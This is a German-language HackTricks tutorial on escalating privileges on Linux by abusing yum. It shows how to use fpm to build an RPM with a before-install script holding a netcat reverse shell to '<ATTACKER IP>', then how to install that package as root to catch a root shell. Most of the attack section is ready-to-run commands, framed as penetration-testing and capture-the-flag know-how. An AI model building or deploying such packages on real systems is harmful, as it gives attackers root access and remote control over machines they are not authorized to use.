hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2024-02-10 15:36:32 +00:00

4.1 KiB

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Weitere Beispiele rund um yum finden Sie auch auf gtfobins.

Ausführen beliebiger Befehle über RPM-Pakete

Überprüfen der Umgebung

Um diesen Vektor zu nutzen, muss der Benutzer yum-Befehle als privilegierter Benutzer, d.h. als root, ausführen können.

Ein funktionierendes Beispiel für diesen Vektor

Ein funktionierendes Beispiel für diesen Exploit finden Sie im Raum daily bugle auf tryhackme.

Verpacken eines RPM

Im folgenden Abschnitt werde ich das Verpacken einer Reverse-Shell in ein RPM mit Hilfe von fpm behandeln.

Das folgende Beispiel erstellt ein Paket, das einen before-install Trigger mit einem beliebigen Skript enthält, das vom Angreifer definiert werden kann. Beim Installieren dieses Pakets wird der beliebige Befehl ausgeführt. Ich habe ein einfaches Beispiel für eine Reverse-Netcat-Shell zur Demonstration verwendet, aber dies kann bei Bedarf geändert werden.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Einen Shell abfangen

Unter Verwendung des obigen Beispiels und unter der Annahme, dass yum als Benutzer mit höheren Berechtigungen ausgeführt werden kann.

  1. Übertragen Sie das RPM auf den Host.
  2. Starten Sie einen Listener auf Ihrem lokalen Host, wie z.B. den Beispiel-Netcat-Listener.
  3. Installieren Sie das verwundbare Paket mit yum localinstall -y exploited-1.0-1.noarch.rpm.
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: